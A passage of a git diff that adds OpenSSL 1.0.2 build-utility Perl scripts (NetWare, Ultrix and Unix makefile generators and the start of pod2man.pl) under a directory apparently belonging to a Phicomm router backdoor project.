+   $asm="";
+   $afile="";
+}
+
+
+
+if ($gnuc)
+{
+   # compile flags for GNUC
+   # additional flags based upon debug | non-debug
+   if ($debug)
+   {
+      $cflags="-g -DDEBUG";
+   }
+   else
+   {
+      $cflags="-O2";
+   }
+   $cflags.=" -nostdinc -I$include_path \\
+         -fno-builtin -fpcc-struct-return -fno-strict-aliasing \\
+         -funsigned-char -Wall -Wno-unused -Wno-uninitialized";
+
+   # link flags
+   $lflags="-T";
+}
+else
+{
+   # compile flags for CodeWarrior
+   # additional flags based upon debug | non-debug
+   if ($debug)
+   {
+      $cflags="-opt off -g -sym internal -DDEBUG";
+   }
+   else
+   {
+   # CodeWarrior compiler has a problem with optimizations for floating
+   # points - no optimizations until further investigation
+   #      $cflags="-opt all";
+   }
+
+   # NOTES: Several c files in the crypto subdirectory include headers from
+   #        their local directories.  Metrowerks wouldn't find these h files
+   #        without adding individual include directives as compile flags
+   #        or modifying the c files.  Instead of adding individual include
+   #        paths for each subdirectory a recursive include directive
+   #        is used ( -ir crypto ).
+   #
+   #        A similar issue exists for the engines and apps subdirectories.
+   #
+   #        Turned off the "possible" warnings ( -w nopossible ).  Metrowerks
+   #        complained a lot about various stuff.  May want to turn back
+   #        on for further development.
+   $cflags.=" -nostdinc -ir crypto -ir ssl -ir engines -ir apps -I$include_path \\
+         -msgstyle gcc -align 4 -processor pentium -char unsigned \\
+         -w on -w nolargeargs -w nopossible -w nounusedarg -w nounusedexpr \\
+         -w noimplicitconv -relax_pointers -nosyspath -maxerrors 20";
+
+   # link flags
+   $lflags="-msgstyle gcc -zerobss -nostdlib -sym internal -commandfile";
+}
+
+# common defines
+$cflags.=" -DL_ENDIAN -DOPENSSL_SYSNAME_NETWARE -U_WIN32";
+
+# If LibC build add in NKS_LIBC define and set the entry/exit
+# routines - The default entry/exit routines are for CLib and don't exist
+# in LibC
+if ($LIBC)
+{
+   $cflags.=" -DNETWARE_LIBC";
+   $nlmstart = "_LibCPrelude";
+   $nlmexit = "_LibCPostlude";
+   @nlm_flags = ("pseudopreemption", "flag_on 64");
+}
+else
+{
+   $cflags.=" -DNETWARE_CLIB";
+   $nlmstart = "_Prelude";
+   $nlmexit = "_Stop";
+}
+
+# If BSD Socket support is requested, set a define for the compiler
+if ($BSDSOCK)
+{
+   $cflags.=" -DNETWARE_BSDSOCK";
+   if (!$LIBC)
+   {
+      $cflags.=" -DNETDB_USE_INTERNET";
+   }
+}
+
+
+# linking stuff
+# for the output directories use the mk1mf.pl values with "_nw" appended
+if ($shlib)
+{
+   if ($LIBC)
+   {
+      $out_def.="_nw_libc_nlm";
+      $tmp_def.="_nw_libc_nlm";
+      $inc_def.="_nw_libc_nlm";
+   }
+   else  # NETWARE_CLIB
+   {
+      $out_def.="_nw_clib_nlm";
+      $tmp_def.="_nw_clib_nlm";
+      $inc_def.="_nw_clib_nlm";
+   }
+}
+else
+{
+   if ($gnuc) # GNUC Tools
+   {
+      $libp=".a";
+      $shlibp=".a";
+      $lib_flags="-cr";
+   }
+   else       # CodeWarrior
+   {
+      $libp=".lib";
+      $shlibp=".lib";
+      $lib_flags="-nodefaults -type library -o";
+   }
+   if ($LIBC)
+   {
+      $out_def.="_nw_libc";
+      $tmp_def.="_nw_libc";
+      $inc_def.="_nw_libc";
+   }
+   else  # NETWARE_CLIB
+   {
+      $out_def.="_nw_clib";
+      $tmp_def.="_nw_clib";
+      $inc_def.="_nw_clib";
+   }
+}
+
+# used by mk1mf.pl
+$obj='.o';
+$ofile='-o ';
+$efile='';
+$exep='.nlm';
+$ex_libs='';
+
+if (!$no_asm)
+{
+   $bn_asm_obj="\$(OBJ_D)${o}bn-nw${obj}";
+   $bn_asm_src="crypto${o}bn${o}asm${o}bn-nw.asm";
+   $bnco_asm_obj="\$(OBJ_D)${o}co-nw${obj}";
+   $bnco_asm_src="crypto${o}bn${o}asm${o}co-nw.asm";
+   $aes_asm_obj="\$(OBJ_D)${o}a-nw${obj}";
+   $aes_asm_src="crypto${o}aes${o}asm${o}a-nw.asm";
+   $des_enc_obj="\$(OBJ_D)${o}d-nw${obj} \$(OBJ_D)${o}y-nw${obj}";
+   $des_enc_src="crypto${o}des${o}asm${o}d-nw.asm crypto${o}des${o}asm${o}y-nw.asm";
+   $bf_enc_obj="\$(OBJ_D)${o}b-nw${obj}";
+   $bf_enc_src="crypto${o}bf${o}asm${o}b-nw.asm";
+   $cast_enc_obj="\$(OBJ_D)${o}c-nw${obj}";
+   $cast_enc_src="crypto${o}cast${o}asm${o}c-nw.asm";
+   $rc4_enc_obj="\$(OBJ_D)${o}r4-nw${obj}";
+   $rc4_enc_src="crypto${o}rc4${o}asm${o}r4-nw.asm";
+   $rc5_enc_obj="\$(OBJ_D)${o}r5-nw${obj}";
+   $rc5_enc_src="crypto${o}rc5${o}asm${o}r5-nw.asm";
+   $md5_asm_obj="\$(OBJ_D)${o}m5-nw${obj}";
+   $md5_asm_src="crypto${o}md5${o}asm${o}m5-nw.asm";
+   $sha1_asm_obj="\$(OBJ_D)${o}s1-nw${obj} \$(OBJ_D)${o}sha256-nw${obj} \$(OBJ_D)${o}sha512-nw${obj}";
+   $sha1_asm_src="crypto${o}sha${o}asm${o}s1-nw.asm crypto${o}sha${o}asm${o}sha256-nw.asm crypto${o}sha${o}asm${o}sha512-nw.asm";
+   $rmd160_asm_obj="\$(OBJ_D)${o}rm-nw${obj}";
+   $rmd160_asm_src="crypto${o}ripemd${o}asm${o}rm-nw.asm";
+   $whirlpool_asm_obj="\$(OBJ_D)${o}wp-nw${obj}";
+   $whirlpool_asm_src="crypto${o}whrlpool${o}asm${o}wp-nw.asm";
+   $cpuid_asm_obj="\$(OBJ_D)${o}x86cpuid-nw${obj}";
+   $cpuid_asm_src="crypto${o}x86cpuid-nw.asm";
+   $cflags.=" -DOPENSSL_CPUID_OBJ -DBN_ASM -DOPENSSL_BN_ASM_PART_WORDS -DMD5_ASM -DWHIRLPOOL_ASM";
+   $cflags.=" -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM";
+   $cflags.=" -DAES_ASM -DRMD160_ASM";
+}
+else
+{
+   $bn_asm_obj='';
+   $bn_asm_src='';
+   $bnco_asm_obj='';
+   $bnco_asm_src='';
+   $aes_asm_obj='';
+   $aes_asm_src='';
+   $des_enc_obj='';
+   $des_enc_src='';
+   $bf_enc_obj='';
+   $bf_enc_src='';
+   $cast_enc_obj='';
+   $cast_enc_src='';
+   $rc4_enc_obj='';
+   $rc4_enc_src='';
+   $rc5_enc_obj='';
+   $rc5_enc_src='';
+   $md5_asm_obj='';
+   $md5_asm_src='';
+   $sha1_asm_obj='';
+   $sha1_asm_src='';
+   $rmd160_asm_obj='';
+   $rmd160_asm_src='';
+   $whirlpool_asm_obj='';
+   $whirlpool_asm_src='';
+   $cpuid_asm_obj='';
+   $cpuid_asm_src='';
+}
+
+# create the *.def linker command files in \openssl\netware\ directory
+sub do_def_file
+{
+   # strip off the leading path
+   my($target) = bname(shift);
+   my($i);
+
+   if ($target =~ /(.*).nlm/)
+   {
+      $target = $1;
+   }
+
+   # special case for openssl - the mk1mf.pl defines E_EXE = openssl
+   if ($target =~ /E_EXE/)
+   {
+      $target =~ s/\$\(E_EXE\)/openssl/;
+   }
+
+   # Note: originally tried to use full path ( \openssl\netware\$target.def )
+   # Metrowerks linker choked on this with an assertion failure. bug???
+   #
+   my($def_file) = "netware${o}$target.def";
+
+   open(DEF_OUT, ">$def_file") || die("unable to open file $def_file\n");
+
+   print( DEF_OUT "# command file generated by netware.pl for NLM target.\n" );
+   print( DEF_OUT "# do not edit this file - all your changes will be lost!!\n" );
+   print( DEF_OUT "#\n");
+   print( DEF_OUT "DESCRIPTION \"$target ($libarch) - OpenSSL $nlmverstr\"\n");
+   print( DEF_OUT "COPYRIGHT \"$nlmcpystr\"\n");
+   print( DEF_OUT "VERSION $nlmvernum\n");
+   print( DEF_OUT "STACK $nlmstack\n");
+   print( DEF_OUT "START $nlmstart\n");
+   print( DEF_OUT "EXIT $nlmexit\n");
+
+   # special case for openssl
+   if ($target eq "openssl")
+   {
+      print( DEF_OUT "SCREENNAME \"OpenSSL $nlmverstr\"\n");
+   }
+   else
+   {
+      print( DEF_OUT "SCREENNAME \"DEFAULT\"\n");
+   }
+
+   foreach $i (@misc_imports)
+   {
+      print( DEF_OUT "IMPORT $i\n");
+   }
+
+   foreach $i (@import_files)
+   {
+      print( DEF_OUT "IMPORT \@$import_path${o}$i\n");
+   }
+
+   foreach $i (@module_files)
+   {
+      print( DEF_OUT "MODULE $i\n");
+   }
+
+   foreach $i (@nlm_flags)
+   {
+      print( DEF_OUT "$i\n");
+   }
+
+   if ($gnuc)
+   {
+      if ($target =~ /openssl/)
+      {
+         print( DEF_OUT "INPUT ${tmp_def}${o}openssl${obj}\n");
+         print( DEF_OUT "INPUT ${tmp_def}${o}openssl${libp}\n");
+      }
+      else
+      {
+         print( DEF_OUT "INPUT ${tmp_def}${o}${target}${obj}\n");
+      }
+      print( DEF_OUT "INPUT $prelude\n");
+      print( DEF_OUT "INPUT ${out_def}${o}${ssl}${libp} ${out_def}${o}${crypto}${libp}\n");
+      print( DEF_OUT "OUTPUT $target.nlm\n");
+   }
+
+   close(DEF_OUT);
+   return($def_file);
+}
+
+sub do_lib_rule
+{
+   my($objs,$target,$name,$shlib)=@_;
+   my($ret);
+
+   $ret.="$target: $objs\n";
+   if (!$shlib)
+   {
+      $ret.="\t\@echo Building Lib: $name\n";
+      $ret.="\t\$(MKLIB) $lib_flags $target $objs\n";
+      $ret.="\t\@echo .\n"
+   }
+   else
+   {
+      die( "Building as NLM not currently supported!" );
+   }
+
+   $ret.="\n";
+   return($ret);
+}
+
+sub do_link_rule
+{
+   my($target,$files,$dep_libs,$libs)=@_;
+   my($ret);
+   my($def_file) = do_def_file($target);
+
+   $ret.="$target: $files $dep_libs\n";
+
+   # NOTE:  When building the test nlms no screen name is given
+   #  which causes the console screen to be used.  By using the console
+   #  screen there is no "<press any key to continue>" message which
+   #  requires user interaction.  The test script ( do_tests.pl ) needs
+   #  to be able to run the tests without requiring user interaction.
+   #
+   #  However, the sample program "openssl.nlm" is used by the tests and is
+   #  a interactive sample so a screen is desired when not be run by the
+   #  tests.  To solve the problem, two versions of the program are built:
+   #    openssl2 - no screen used by tests
+   #    openssl - default screen - use for normal interactive modes
+   #
+
+   # special case for openssl - the mk1mf.pl defines E_EXE = openssl
+   if ($target =~ /E_EXE/)
+   {
+      my($target2) = $target;
+
+      $target2 =~ s/\(E_EXE\)/\(E_EXE\)2/;
+
+      # openssl2
+      my($def_file2) = do_def_file($target2);
+
+      if ($gnuc)
+      {
+         $ret.="\t\$(MKLIB) $lib_flags \$(TMP_D)${o}\$(E_EXE).a \$(filter-out \$(TMP_D)${o}\$(E_EXE)${obj},$files)\n";
+         $ret.="\t\$(LINK) \$(LFLAGS) $def_file2\n";
+         $ret.="\t\@$mv \$(E_EXE)2.nlm \$(TEST_D)\n";
+      }
+      else
+      {
+         $ret.="\t\$(LINK) \$(LFLAGS) $def_file2 $files \"$prelude\" $libs -o $target2\n";
+      }
+   }
+   if ($gnuc)
+   {
+      $ret.="\t\$(LINK) \$(LFLAGS) $def_file\n";
+      $ret.="\t\@$mv \$(\@F) \$(TEST_D)\n";
+   }
+   else
+   {
+      $ret.="\t\$(LINK) \$(LFLAGS) $def_file $files \"$prelude\" $libs -o $target\n";
+   }
+
+   $ret.="\n";
+   return($ret);
+
+}
+
+1;
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/pl/ultrix.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/pl/ultrix.pl
new file mode 100644
index 0000000..ea370c7
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/pl/ultrix.pl
@@ -0,0 +1,38 @@
+#!/usr/local/bin/perl
+#
+# linux.pl - the standard unix makefile stuff.
+#
+
+$o='/';
+$cp='/bin/cp';
+$rm='/bin/rm -f';
+
+# C compiler stuff
+
+$cc='cc';
+if ($debug)
+	{ $cflags="-g -DREF_CHECK -DCRYPTO_MDEBUG"; }
+else
+	{ $cflags="-O2"; }
+
+$cflags.=" -std1 -DL_ENDIAN";
+
+if (!$no_asm)
+	{
+	$bn_asm_obj='$(OBJ_D)/mips1.o';
+	$bn_asm_src='crypto/bn/asm/mips1.s';
+	}
+
+sub do_link_rule
+	{
+	local($target,$files,$dep_libs,$libs)=@_;
+	local($ret,$_);
+	
+	$file =~ s/\//$o/g if $o ne '/';
+	$n=&bname($target);
+	$ret.="$target: $files $dep_libs\n";
+	$ret.="\t\$(LINK) ${efile}$target \$(LFLAGS) $files $libs\n\n";
+	return($ret);
+	}
+
+1;
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/pl/unix.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/pl/unix.pl
new file mode 100644
index 0000000..82f1aa7
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/pl/unix.pl
@@ -0,0 +1,443 @@
+#!/usr/local/bin/perl
+#
+# unix.pl - the standard unix makefile stuff.
+#
+
+$o='/';
+$cp='/bin/cp';
+$rm='/bin/rm -f';
+
+# C compiler stuff
+
+if ($gcc)
+	{
+	$cc='gcc';
+	if ($debug)
+		{ $cflags="-g2 -ggdb"; }
+	else
+		{ $cflags="-O3 -fomit-frame-pointer"; }
+	}
+else
+	{
+	$cc='cc';
+	if ($debug)
+		{ $cflags="-g"; }
+	else
+		{ $cflags="-O"; }
+	}
+$obj='.o';
+$asm_suffix='.s';
+$ofile='-o ';
+
+# EXE linking stuff
+$link='${CC}';
+$lflags='${CFLAG}';
+$efile='-o ';
+$exep='';
+$ex_libs="";
+
+# static library stuff
+$mklib='ar r';
+$mlflags='';
+$ranlib=&which("ranlib") or $ranlib="true";
+$plib='lib';
+$libp=".a";
+$shlibp=".a";
+$lfile='';
+
+$asm='as';
+$afile='-o ';
+$bn_asm_obj="";
+$bn_asm_src="";
+$des_enc_obj="";
+$des_enc_src="";
+$bf_enc_obj="";
+$bf_enc_src="";
+
+%perl1 = (
+	  'md5-x86_64' => 'crypto/md5',
+	  'x86_64-mont' => 'crypto/bn',
+	  'x86_64-mont5' => 'crypto/bn',
+	  'x86_64-gf2m' => 'crypto/bn',
+	  'modexp512-x86_64' => 'crypto/bn',
+	  'aes-x86_64' => 'crypto/aes',
+	  'vpaes-x86_64' => 'crypto/aes',
+	  'bsaes-x86_64' => 'crypto/aes',
+	  'aesni-x86_64' => 'crypto/aes',
+	  'aesni-sha1-x86_64' => 'crypto/aes',
+	  'sha1-x86_64' => 'crypto/sha',
+	  'e_padlock-x86_64' => 'engines',
+	  'rc4-x86_64' => 'crypto/rc4',
+	  'rc4-md5-x86_64' => 'crypto/rc4',
+	  'ghash-x86_64' => 'crypto/modes',
+	  'aesni-gcm-x86_64' => 'crypto/modes',
+	  'aesni-sha256-x86_64' => 'crypto/aes',
+          'rsaz-x86_64' => 'crypto/bn',
+          'rsaz-avx2' => 'crypto/bn',
+	  'aesni-mb-x86_64' => 'crypto/aes',
+	  'sha1-mb-x86_64' => 'crypto/sha',
+	  'sha256-mb-x86_64' => 'crypto/sha',
+	  'ecp_nistz256-x86_64' => 'crypto/ec',
+         );
+
+# If I were feeling more clever, these could probably be extracted
+# from makefiles.
+sub platform_perlasm_compile_target
+	{
+	local($target, $source, $bname) = @_;
+
+	for $p (keys %perl1)
+	        {
+		if ($target eq "\$(OBJ_D)/$p.o")
+		        {
+			return << "EOF";
+\$(TMP_D)/$p.s: $perl1{$p}/asm/$p.pl
+	\$(PERL) $perl1{$p}/asm/$p.pl \$(PERLASM_SCHEME) > \$@
+EOF
+		        }
+	        }
+	if ($target eq '$(OBJ_D)/x86_64cpuid.o')
+		{
+		return << 'EOF';
+$(TMP_D)/x86_64cpuid.s: crypto/x86_64cpuid.pl
+	$(PERL) crypto/x86_64cpuid.pl $(PERLASM_SCHEME) > $@
+EOF
+		}
+	elsif ($target eq '$(OBJ_D)/sha256-x86_64.o')
+		{
+		return << 'EOF';
+$(TMP_D)/sha256-x86_64.s: crypto/sha/asm/sha512-x86_64.pl
+	$(PERL) crypto/sha/asm/sha512-x86_64.pl $(PERLASM_SCHEME) $@
+EOF
+	        }
+	elsif ($target eq '$(OBJ_D)/sha512-x86_64.o')
+		{
+		return << 'EOF';
+$(TMP_D)/sha512-x86_64.s: crypto/sha/asm/sha512-x86_64.pl
+	$(PERL) crypto/sha/asm/sha512-x86_64.pl $(PERLASM_SCHEME) $@
+EOF
+	        }
+	elsif ($target eq '$(OBJ_D)/sha512-x86_64.o')
+		{
+		return << 'EOF';
+$(TMP_D)/sha512-x86_64.s: crypto/sha/asm/sha512-x86_64.pl
+	$(PERL) crypto/sha/asm/sha512-x86_64.pl $(PERLASM_SCHEME) $@
+EOF
+	        }
+
+	die $target;
+	}
+
+sub special_compile_target
+	{
+	local($target) = @_;
+
+	if ($target eq 'crypto/bn/x86_64-gcc')
+		{
+		return << "EOF";
+\$(TMP_D)/x86_64-gcc.o:	crypto/bn/asm/x86_64-gcc.c
+	\$(CC) \$(CFLAGS) -c -o \$@ crypto/bn/asm/x86_64-gcc.c
+EOF
+		}
+	return undef;
+	}
+
+sub do_lib_rule
+	{
+	local($obj,$target,$name,$shlib)=@_;
+	local($ret,$_,$Name);
+
+	$target =~ s/\//$o/g if $o ne '/';
+	$target="$target";
+	($Name=$name) =~ tr/a-z/A-Z/;
+
+	$ret.="$target: \$(${Name}OBJ)\n";
+	$ret.="\t\$(RM) $target\n";
+	$ret.="\t\$(MKLIB) $target \$(${Name}OBJ)\n";
+	$ret.="\t\$(RANLIB) $target\n\n";
+	}
+
+sub do_link_rule
+	{
+	local($target,$files,$dep_libs,$libs)=@_;
+	local($ret,$_);
+
+	$file =~ s/\//$o/g if $o ne '/';
+	$n=&bname($target);
+	$ret.="$target: $files $dep_libs\n";
+	$ret.="\t\$(LINK) ${efile}$target \$(LFLAGS) $files $libs\n\n";
+	return($ret);
+	}
+
+sub which
+	{
+	my ($name)=@_;
+	my $path;
+	foreach $path (split /:/, $ENV{PATH})
+		{
+		if (-x "$path/$name")
+			{
+			return "$path/$name";
+			}
+		}
+	}
+
+sub fixtests
+  {
+  my ($str, $tests) = @_;
+
+  foreach my $t (keys %$tests)
+    {
+    $str =~ s/(\.\/)?\$\($t\)/\$(TEST_D)\/$tests->{$t}/g;
+    }
+
+  return $str;
+  }
+
+sub fixdeps
+ {
+  my ($str, $fakes) = @_;
+
+  my @t = split(/\s+/, $str);
+  $str = '';
+  foreach my $t (@t)
+    {
+    $str .= ' ' if $str ne '';
+    if (exists($fakes->{$t}))
+      {
+      $str .= $fakes->{$t};
+      next;
+      }
+    if ($t =~ /^[^\/]+$/)
+      {
+      $str .= '$(TEST_D)/' . $t;
+      }
+    else
+      {
+      $str .= $t;
+      }
+    }
+
+  return $str;
+  }
+
+sub fixrules
+  {
+  my ($str) = @_;
+
+  # Compatible with -j...
+  $str =~ s/^(\s+@?)/$1cd \$(TEST_D) && /;
+  return $str;
+
+  # Compatible with not -j.
+  my @t = split("\n", $str);
+  $str = '';
+  my $prev;
+  foreach my $t (@t)
+    {
+    $t =~ s/^\s+//;
+    if (!$prev)
+      {
+      if ($t =~ /^@/)
+	{
+        $t =~ s/^@/\@cd \$(TEST_D) && /;
+        }
+      elsif ($t !~ /^\s*#/)
+	{
+        $t = 'cd $(TEST_D) && ' . $t;
+        }
+      }
+    $str .= "\t$t\n";
+    $prev = $t =~/\\$/;
+    }
+  return $str;
+}
+
+sub copy_scripts
+  {
+  my ($sed, $src, @targets) = @_;
+
+  my $s = '';
+  foreach my $t (@targets)
+    {
+    # Copy first so we get file modes...
+    $s .= "\$(TEST_D)/$t: \$(SRC_D)/$src/$t\n\tcp \$(SRC_D)/$src/$t \$(TEST_D)/$t\n";
+    $s .= "\tsed -e 's/\\.\\.\\/apps/..\\/\$(OUT_D)/' -e 's/\\.\\.\\/util/..\\/\$(TEST_D)/' < \$(SRC_D)/$src/$t > \$(TEST_D)/$t\n" if $sed;
+    $s .= "\n";
+    }
+  return $s;
+  }
+
+sub get_tests
+  {
+  my ($makefile) = @_;
+
+  open(M, $makefile) || die "Can't open $makefile: $!";
+  my %targets;
+  my %deps;
+  my %tests;
+  my %alltests;
+  my %fakes;
+  while (my $line = <M>)
+    {
+    chomp $line;
+    while ($line =~ /^(.*)\\$/)
+      {
+      $line = $1 . <M>;
+      }
+
+    if ($line =~ /^alltests:(.*)$/)
+      {
+      my @t = split(/\s+/, $1);
+      foreach my $t (@t)
+	{
+	$targets{$t} = '';
+	$alltests{$t} = undef;
+        }
+      }
+
+    if (($line =~ /^(?<t>\S+):(?<d>.*)$/ && exists $targets{$1})
+	|| $line =~ /^(?<t>test_(ss|gen) .*):(?<d>.*)/)
+      {
+      my $t = $+{t};
+      my $d = $+{d};
+      # If there are multiple targets stupid FreeBSD make runs the
+      # rules once for each dependency that matches one of the
+      # targets. Running the same rule twice concurrently causes
+      # breakage, so replace with a fake target.
+      if ($t =~ /\s/)
+        {
+	++$fake;
+	my @targets = split /\s+/, $t;
+	$t = "_fake$fake";
+	foreach my $f (@targets)
+	  {
+	  $fakes{$f} = $t;
+	  }
+	}
+      $deps{$t} = $d;
+      $deps{$t} =~ s/#.*$//;
+      for (;;)
+	{
+	$line = <M>;
+	chomp $line;
+	last if $line eq '';
+	$targets{$t} .= "$line\n";
+        }
+      next;
+      }
+
+    if ($line =~ /^(\S+TEST)=\s*(\S+)$/)
+      {
+      $tests{$1} = $2;
+      next;
+      }
+    }
+
+  delete $alltests{test_jpake} if $no_jpake;
+  delete $targets{test_ige} if $no_ige;
+  delete $alltests{test_md2} if $no_md2;
+  delete $alltests{test_rc5} if $no_rc5;
+
+  my $tests;
+  foreach my $t (keys %tests)
+    {
+    $tests .= "$t = $tests{$t}\n";
+    }
+
+  my $each;
+  foreach my $t (keys %targets)
+    {
+    next if $t eq '';
+
+    my $d = $deps{$t};
+    $d =~ s/\.\.\/apps/\$(BIN_D)/g;
+    $d =~ s/\.\.\/util/\$(TEST_D)/g;
+    $d = fixtests($d, \%tests);
+    $d = fixdeps($d, \%fakes);
+
+    my $r = $targets{$t};
+    $r =~ s/\.\.\/apps/..\/\$(BIN_D)/g;
+    $r =~ s/\.\.\/util/..\/\$(TEST_D)/g;
+    $r =~ s/\.\.\/(\S+)/\$(SRC_D)\/$1/g;
+    $r = fixrules($r);
+
+    next if $r eq '';
+
+    $t =~ s/\s+/ \$(TEST_D)\//g;
+
+    $each .= "$t: test_scripts $d\n\t\@echo '$t test started'\n$r\t\@echo '$t test done'\n\n";
+    }
+
+  # FIXME: Might be a clever way to figure out what needs copying
+  my @copies = ( 'bctest',
+		 'testgen',
+		 'cms-test.pl',
+		 'tx509',
+		 'test.cnf',
+		 'testenc',
+		 'tocsp',
+		 'testca',
+		 'CAss.cnf',
+		 'testtsa',
+		 'CAtsa.cnf',
+		 'Uss.cnf',
+		 'P1ss.cnf',
+		 'P2ss.cnf',
+		 'tcrl',
+		 'tsid',
+		 'treq',
+		 'tpkcs7',
+		 'tpkcs7d',
+		 'testcrl.pem',
+		 'testx509.pem',
+		 'v3-cert1.pem',
+		 'v3-cert2.pem',
+		 'testreq2.pem',
+		 'testp7.pem',
+		 'pkcs7-1.pem',
+		 'trsa',
+		 'testrsa.pem',
+		 'testsid.pem',
+		 'testss',
+		 'testssl',
+		 'testsslproxy',
+		 'serverinfo.pem',
+	       );
+  my $copies = copy_scripts(1, 'test', @copies);
+  $copies .= copy_scripts(0, 'test', ('smcont.txt'));
+
+  my @utils = ( 'shlib_wrap.sh',
+		'opensslwrap.sh',
+	      );
+  $copies .= copy_scripts(1, 'util', @utils);
+
+  my @apps = ( 'CA.sh',
+	       'openssl.cnf',
+	       'server2.pem',
+	     );
+  $copies .= copy_scripts(1, 'apps', @apps);
+
+  $copies .= copy_scripts(1, 'crypto/evp', ('evptests.txt'));
+
+  $scripts = "test_scripts: \$(TEST_D)/CA.sh \$(TEST_D)/opensslwrap.sh \$(TEST_D)/openssl.cnf \$(TEST_D)/shlib_wrap.sh ocsp smime\n";
+  $scripts .= "\nocsp:\n\tcp -R test/ocsp-tests \$(TEST_D)\n";
+  $scripts .= "\smime:\n\tcp -R test/smime-certs \$(TEST_D)\n";
+
+  my $all = 'test:';
+  foreach my $t (keys %alltests)
+    {
+    if (exists($fakes{$t}))
+      {
+      $all .= " $fakes{$t}";
+      }
+    else
+      {
+      $all .= " $t";
+      }
+    }
+
+  return "$scripts\n$copies\n$tests\n$all\n\n$each";
+  }
+
+1;
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/pod2man.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/pod2man.pl
new file mode 100755
index 0000000..025d914
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/pod2man.pl
@@ -0,0 +1,1184 @@
+: #!/usr/bin/perl-5.005
+    eval 'exec /usr/bin/perl -S $0 ${1+"$@"}'
+	if $running_under_some_shell;
+
+$DEF_PM_SECTION = '3pm' || '3';
+
+=head1 NAME
+
+pod2man - translate embedded Perl pod directives into man pages
+
+=head1 SYNOPSIS
+
+B<pod2man>
+[ B<--section=>I<manext> ]
+[ B<--release=>I<relpatch> ]
+[ B<--center=>I<string> ]
+[ B<--date=>I<string> ]
+[ B<--fixed=>I<font> ]
+[ B<--official> ]
+[ B<--lax> ]
+I<inputfile>
+
+=head1 DESCRIPTION
+
+B<pod2man> converts its input file containing embedded pod directives (see
+L<perlpod>) into nroff source suitable for viewing with nroff(1) or
+troff(1) using the man(7) macro set.
+
+Besides the obvious pod conversions, B<pod2man> also takes care of
+func(), func(n), and simple variable references like $foo or @bar so
+you don't have to use code escapes for them; complex expressions like
+C<$fred{'stuff'}> will still need to be escaped, though.  Other nagging
+little roffish things that it catches include translating the minus in
+something like foo-bar, making a long dash--like this--into a real em
+dash, fixing up "paired quotes", putting a little space after the
+parens in something like func(), making C++ and PI look right, making
+double underbars have a little tiny space between them, making ALLCAPS
+a teeny bit smaller in troff(1), and escaping backslashes so you don't
+have to.
+
+=head1 OPTIONS
+
+=over 8
+
+=item center
+
+Set the centered header to a specific string.  The default is
+"User Contributed Perl Documentation", unless the C<--official> flag is
+given, in which case the default is "Perl Programmers Reference Guide".
+
+=item date
+
+Set the left-hand footer string to this value.  By default,
+the modification date of the input file will be used.
+
+=item fixed
+
+The fixed font to use for code refs.  Defaults to CW.
+
+=item official
+
+Set the default header to indicate that this page is of
+the standard release in case C<--center> is not given.
+
+=item release
+
+Set the centered footer.  By default, this is the current
+perl release.
+
+=item section
+
+Set the section for the C<.TH> macro.  The standard conventions on
+sections are to use 1 for user commands,  2 for system calls, 3 for
+functions, 4 for devices, 5 for file formats, 6 for games, 7 for
+miscellaneous information, and 8 for administrator commands.  This works
+best if you put your Perl man pages in a separate tree, like
+F</usr/local/perl/man/>.  By default, section 1 will be used
+unless the file ends in F<.pm> in which case section 3 will be selected.
+
+=item lax
+
+Don't complain when required sections aren't present.
+
+=back
+
+=head1 Anatomy of a Proper Man Page
+
+For those not sure of the proper layout of a man page, here's
+an example of the skeleton of a proper man page.  Head of the
+major headers should be setout as a C<=head1> directive, and
+are historically written in the rather startling ALL UPPER CASE
+format, although this is not mandatory.
+Minor headers may be included using C<=head2>, and are
+typically in mixed case.
+
+=over 10
+
+=item NAME
+
+Mandatory section; should be a comma-separated list of programs or
+functions documented by this podpage, such as:
+
+    foo, bar - programs to do something
+
+=item SYNOPSIS
+
+A short usage summary for programs and functions, which
+may someday be deemed mandatory.
+
+=item DESCRIPTION
+
+Long drawn out discussion of the program.  It's a good idea to break this
+up into subsections using the C<=head2> directives, like
+
+    =head2 A Sample Subection
+
+    =head2 Yet Another Sample Subection
+
+=item OPTIONS
+
+Some people make this separate from the description.
+
+=item RETURN VALUE
+
+What the program or function returns if successful.
+
+=item ERRORS
+
+Exceptions, return codes, exit stati, and errno settings.
+
+=item EXAMPLES
+
+Give some example uses of the program.
+
+=item ENVIRONMENT
+
+Envariables this program might care about.
+
+=item FILES
+
+All files used by the program.  You should probably use the FE<lt>E<gt>
+for these.
+
+=item SEE ALSO
+
+Other man pages to check out, like man(1), man(7), makewhatis(8), or catman(8).
+
+=item NOTES
+
+Miscellaneous commentary.
+
+=item CAVEATS
+
+Things to take special care with; sometimes called WARNINGS.
+
+=item DIAGNOSTICS
+
+All possible messages the program can print out--and
+what they mean.
+
+=item BUGS
+
+Things that are broken or just don't work quite right.
+
+=item RESTRICTIONS
+
+Bugs you don't plan to fix :-)
+
+=item AUTHOR
+
+Who wrote it (or AUTHORS if multiple).
+
+=item HISTORY
+
+Programs derived from other sources sometimes have this, or
+you might keep a modification log here.
+
+=back
+
+=head1 EXAMPLES
+
+    pod2man program > program.1
+    pod2man some_module.pm > /usr/perl/man/man3/some_module.3
+    pod2man --section=7 note.pod > note.7
+
+=head1 DIAGNOSTICS
+
+The following diagnostics are generated by B<pod2man>.  Items
+marked "(W)" are non-fatal, whereas the "(F)" errors will cause
+B<pod2man> to immediately exit with a non-zero status.
+
+=over 4
+
+=item bad option in paragraph %d of %s: ``%s'' should be [%s]<%s>
+
+(W) If you start include an option, you should set it off
+as bold, italic, or code.
+
+=item can't open %s: %s
+
+(F) The input file wasn't available for the given reason.
+
+=item Improper man page - no dash in NAME header in paragraph %d of %s
+
+(W) The NAME header did not have an isolated dash in it.  This is
+considered important.
+
+=item Invalid man page - no NAME line in %s
+
+(F) You did not include a NAME header, which is essential.
+
